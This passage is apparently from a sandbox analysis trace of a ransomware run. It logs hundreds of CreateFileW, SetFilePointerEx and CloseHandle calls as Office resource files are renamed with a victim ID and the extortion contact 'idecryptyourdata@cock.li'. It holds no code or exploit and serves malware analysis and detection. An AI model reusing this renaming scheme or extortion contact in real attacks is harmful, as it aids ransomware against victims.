lpNewFilePointer=0x0) returned 1 [0176.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR28B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir28b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.545] CloseHandle (hObject=0x534) returned 1 [0176.546] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.546] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR28F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir28f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.546] CloseHandle (hObject=0x534) returned 1 [0176.547] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.547] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR29B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir29b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.547] CloseHandle (hObject=0x534) returned 1 [0176.548] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.548] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR29F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir29f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.549] CloseHandle (hObject=0x534) returned 1 [0176.550] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.550] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR2B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir2b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.550] CloseHandle (hObject=0x534) returned 1 [0176.551] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.551] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR2F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir2f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.551] CloseHandle (hObject=0x534) returned 1 [0176.552] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.552] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR30B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir30b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.552] CloseHandle (hObject=0x534) returned 1 [0176.553] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.553] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR30F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir30f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.553] CloseHandle (hObject=0x534) returned 1 [0176.554] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.554] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR31B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir31b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.554] CloseHandle (hObject=0x534) returned 1 [0176.555] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.555] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR31F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir31f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.556] CloseHandle (hObject=0x534) returned 1 [0176.557] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.557] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR32B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir32b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.557] CloseHandle (hObject=0x534) returned 1 [0176.559] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.559] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR32F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir32f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.559] CloseHandle (hObject=0x534) returned 1 [0176.560] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.560] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR33B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir33b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.560] CloseHandle (hObject=0x534) returned 1 [0176.561] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.561] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR33F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir33f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.561] CloseHandle (hObject=0x534) returned 1 [0176.561] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.561] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR34B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir34b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.562] CloseHandle (hObject=0x534) returned 1 [0176.562] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.562] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR34F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir34f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.563] CloseHandle (hObject=0x534) returned 1 [0176.563] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.563] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR35B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir35b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.717] CloseHandle (hObject=0x534) returned 1 [0176.746] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.746] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR4F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir4f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.746] CloseHandle (hObject=0x530) returned 1 [0176.747] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.747] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR51B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir51b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.748] CloseHandle (hObject=0x530) returned 1 [0176.748] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.748] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR51F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir51f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.749] CloseHandle (hObject=0x530) returned 1 [0176.749] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.749] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR5B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir5b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.750] CloseHandle (hObject=0x530) returned 1 [0176.751] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.751] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR5F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir5f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.751] CloseHandle (hObject=0x530) returned 1 [0176.753] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.753] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR6B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir6b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.753] CloseHandle (hObject=0x530) returned 1 [0176.755] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.755] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR6F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir6f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.755] CloseHandle (hObject=0x530) returned 1 [0176.756] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.756] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR7B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir7b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.756] CloseHandle (hObject=0x530) returned 1 [0176.757] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.758] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR7F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir7f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.758] CloseHandle (hObject=0x530) returned 1 [0176.758] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.759] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR8B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir8b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.759] CloseHandle (hObject=0x530) returned 1 [0176.759] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.760] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR8F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir8f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.760] CloseHandle (hObject=0x530) returned 1 [0176.760] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.761] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR9B.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir9b.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.761] CloseHandle (hObject=0x530) returned 1 [0176.761] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.762] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR9F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir9f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.762] CloseHandle (hObject=0x530) returned 1 [0176.763] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.763] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPAPERS.INI.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpapers.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.763] CloseHandle (hObject=0x530) returned 1 [0176.764] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.764] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR00.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir00.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.764] CloseHandle (hObject=0x530) 